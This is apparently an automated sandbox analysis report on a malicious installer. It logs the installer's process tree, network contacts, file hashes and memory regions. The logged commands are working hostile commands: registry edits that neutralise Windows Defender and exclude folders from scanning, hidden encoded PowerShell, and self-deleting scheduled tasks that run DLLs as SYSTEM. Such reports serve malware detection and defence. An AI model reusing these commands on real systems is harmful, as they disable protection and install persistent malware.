\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VDiAXGzPiWUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VDiAXGzPiWUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epUZFeichsCPC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epUZFeichsCPC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fZHZowTYSgfU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fZHZowTYSgfU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qBvbbKpBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qBvbbKpBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nxeoDZreGracWIVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nxeoDZreGracWIVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\JHEwijpMlSQrgvQB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\JHEwijpMlSQrgvQB\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VDiAXGzPiWUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VDiAXGzPiWUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epUZFeichsCPC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epUZFeichsCPC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fZHZowTYSgfU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fZHZowTYSgfU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qBvbbKpBU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qBvbbKpBU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nxeoDZreGracWIVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nxeoDZreGracWIVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\JHEwijpMlSQrgvQB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\JHEwijpMlSQrgvQB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gtuYppepa" /SC once /ST 04:00:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gtuYppepa"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gtuYppepa"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "MWViHNuTpmRlpInKg" /SC once /ST 03:26:11 /RU "SYSTEM" /TR "\"C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe\" Ci /LMsite_idfjF 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "MWViHNuTpmRlpInKg"

C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe

C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe Ci /LMsite_idfjF 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bpJjqbWMDOjxkYrvBb"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\qBvbbKpBU\wTDcpw.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "wbeMFPOaxEodGIM" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "wbeMFPOaxEodGIM2" /F /xml "C:\Program Files (x86)\qBvbbKpBU\xQnaRLd.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "wbeMFPOaxEodGIM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "wbeMFPOaxEodGIM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ahmsGQGyepwQnm" /F /xml "C:\Program Files (x86)\fZHZowTYSgfU2\vZajwhU.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "NOwjEMTwOUYCj2" /F /xml "C:\ProgramData\nxeoDZreGracWIVB\QOFtfPe.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZeWhkVIxDswmIVkZF2" /F /xml "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\LlqHhEU.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "rhpwGKPBtZLjUbFdohf2" /F /xml "C:\Program Files (x86)\epUZFeichsCPC\eYzHLaL.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BinjFlxHFUMMGNOij" /SC once /ST 00:37:44 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\JHEwijpMlSQrgvQB\gjmcrxLt\TEFcZVt.dll\",#1 /JCsite_idDSz 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "BinjFlxHFUMMGNOij"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\JHEwijpMlSQrgvQB\gjmcrxLt\TEFcZVt.dll",#1 /JCsite_idDSz 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\JHEwijpMlSQrgvQB\gjmcrxLt\TEFcZVt.dll",#1 /JCsite_idDSz 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "MWViHNuTpmRlpInKg"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "BinjFlxHFUMMGNOij"

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 service-domain.xyz udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 40.13.222.173.in-addr.arpa udp
US 8.8.8.8:53 193.179.17.96.in-addr.arpa udp
DE 216.58.206.46:443 clients2.google.com tcp
DE 142.250.186.65:443 clients2.googleusercontent.com tcp
DE 216.58.206.46:443 clients2.google.com tcp
US 44.239.141.158:80 api3.check-data.xyz tcp

Files

C:\Users\Admin\AppData\Local\Temp\7zS3671.tmp\Install.exe

MD5 179fb197a3d7311375c9037091fc224c
SHA1 802c18d747c379acd9c9a1fcae6e29636b7bd224
SHA256 ff3ef3388be54902b91b3833f2abea5b31fe50f4b5f1cc8be06d6aca1b6683b9
SHA512 c2d30d078c1358fcbfa5079893ab21c745df2532deee61b84e3eec395efeded6769a73c3d961fbb7f71260a6303e0f9cf22f37111fb90e7b8d4e4fdbd0337317

memory/2828-4-0x0000000000AA0000-0x000000000115A000-memory.dmp

memory/2828-5-0x0000000010000000-0x0000000014B4C000-memory.dmp

memory/4936-8-0x0000000003340000-0x0000000003376000-memory.dmp

memory/4936-9-0x0000000073380000-0x0000000073B31000-memory.dmp

memory/4936-11-0x0000000003490000-0x00000000034A0000-memory.dmp

memory/4936-10-0x0000000003490000-0x00000000034A0000-memory.dmp

memory/4936-12-0x0000000005B70000-0x000000000619A000-memory.dmp

memory/4936-13-0x0000000005990000-0x00000000059B2000-memory.dmp

memory/4936-15-0x0000000006310000-0x0000000006376000-memory.dmp

memory/4936-14-0x00000000062A0000-0x0000000006306000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nc1oimti.05m.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4936-24-0x0000000006380000-0x00000000066D7000-memory.dmp

memory/4936-25-0x0000000006810000-0x000000000682E000-memory.dmp

memory/4936-26-0x0000000006850000-0x000000000689C000-memory.dmp

memory/4936-29-0x0000000073380000-0x0000000073B31000-memory.dmp

memory/2828-33-0x0000000000AA0000-0x000000000115A000-memory.dmp

memory/3016-35-0x0000000000020000-0x00000000006DA000-memory.dmp

memory/3016-36-0x0000000010000000-0x0000000014B4C000-memory.dmp

memory/3376-39-0x0000000073350000-0x0000000073B01000-memory.dmp

memory/3376-41-0x0000000000EE0000-0x0000000000EF0000-memory.dmp

memory/3376-40-0x0000000000EE0000-0x0000000000EF0000-memory.dmp

memory/3376-42-0x0000000004200000-0x0000000004557000-memory.dmp

memory/3376-51-0x0000000004700000-0x000000000474C000-memory.dmp

memory/3376-54-0x0000000073350000-0x0000000073B01000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 5b74da6778ccaa0e1ca4ae7484775943
SHA1 0a2f6f315a0ca1a0366b509aec7b13c606645654
SHA256 172282931d7eeb60228e6b9b4b913fd78c73f2a7855620f35fb24a5c847b6c78
SHA512 20b4cb7174f49b22426b249f1dfc8f6273f50d1502536e773f4dcd073bf027f2a554d2437c2dc628dbe021c5c3b968b2d89f810ff1bb19630c1560e7feee1a1a

memory/864-57-0x0000000003AA0000-0x0000000003AB0000-memory.dmp

memory/864-56-0x0000000073350000-0x0000000073B01000-memory.dmp

